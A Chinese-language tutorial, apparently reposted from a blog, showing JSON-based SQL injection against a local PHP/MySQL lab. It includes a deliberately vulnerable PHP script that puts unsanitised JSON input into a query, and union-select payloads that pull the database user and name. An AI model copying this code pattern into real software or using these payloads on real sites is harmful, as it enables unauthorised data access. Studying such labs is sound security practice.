linuxjson写sql注入,sql注入之json注入（php代码）

环境

phpstudy

php服务端代码

security数据库中的users表中的username&＃xff0c;password字段

用户名admin

JSON服务端代码

大家实际测试中注意修改相关的数据库名、表名、字段名等

// php防止中文乱码

header(‘content-type:text/html;charset&＃61;utf-8‘);

if(isset($_POST[‘json‘])){

$json_str&＃61;$_POST[‘json‘];

$json&＃61;json_decode($json_str);

if(!$json){

die(‘JSON文档格式有误&＃xff0c;请检查‘);

}

$username&＃61;$json->username;

//$password&＃61;$json->password;

// 建立mysql连接&＃xff0c;root/root连接本地数据库

$mysqli&＃61;new mysqli();

$mysqli->connect(‘localhost‘,‘root‘,‘root‘);

if($mysqli->connect_errno){

die(‘数据库连接失败&＃xff1a;‘.$mysqli->connect_error);

}

// 要操作的数据库名&＃xff0c;我的数据库是security

$mysqli->select_db(‘security‘);

if($mysqli->errno){

dir(‘打开数据库失败&＃xff1a;‘.$mysqli->error);

}

// 数据库编码格式

$mysqli->set_charset(‘utf-8‘);

// 从users表中查询username&＃xff0c;password字段

$sql&＃61;"SELECT username,password FROM users WHERE username&＃61;‘{$username}‘";

$result&＃61;$mysqli->query($sql);

if(!$result){

die(‘执行SQL语句失败&＃xff1a;‘.$mysqli->error);

}else if($result->num_rows&＃61;&＃61;0){

die(‘查询结果为空‘);

}else {

$array1&＃61;$result->fetch_all(MYSQLI_ASSOC);

echo "用户名&＃xff1a;{$array1[0][‘username‘]},密码&＃xff1a;{$array1[0][‘password‘]}";

}

// 释放资源

$result->free();

$mysqli->close();

}

?>

进行注入

1、按照特定的数据格式查询admin用户密码

json&＃61;{"username":"admin"}

2、查看源代码&＃xff0c;构造payload

代码中的sql语句是这个样子的&＃xff0c;构造payload进行注入

3、判断当前数据库有多少列

2正常&＃xff0c;3报错&＃xff0c;判断当前数据库有2列

json&＃61;{"username":"admin‘ order by 3#"}

4、注入带出来数据

json&＃61;{"username":"admin‘ and 1&＃61;2 union select 1,2#"}

json&＃61;{"username":"admin‘ and 1&＃61;2 union select user(),database()#"}

接下来就是注入操作了&＃xff0c;在此不做后续注入...

参考博客

原文&＃xff1a;https://www.cnblogs.com/shley/p/14737017.html